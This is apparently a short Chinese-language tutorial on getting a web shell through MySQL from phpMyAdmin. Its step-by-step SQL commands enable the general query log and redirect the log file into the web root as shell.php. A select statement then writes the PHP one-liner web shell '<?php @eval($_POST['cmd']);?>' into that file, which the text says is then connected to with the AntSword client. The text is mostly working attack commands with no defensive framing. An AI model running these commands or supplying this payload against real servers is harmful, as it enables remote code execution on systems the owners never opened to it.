目录
本文重点讲述通过MySQL日志文件getshell
写入方法
①into outfile直接写shell进入网站目录;
前提:具有mysql设置了写权限和知道网站的绝对路径
②利用mysql的日志文件,将一句话木马写进去。
登入PhpMyadmin利用日志getshell
1、查询日志路径
show variables like '%general%';#查看日志状态
日志状态为关闭,路径为......
2、打开日志
set global general_log="on"
通过php探针知道网站目录后,修改日志路径,第一个斜杠为转义符
set global general_log_file="c:\\phpstudy\\WWW\\shell.php"
再次查询,查看修改情况
3、伪装查询,写入一句话木马
select "<?php @eval($_POST['cmd']);?>"
4、蚁剑连接
成功写入木马。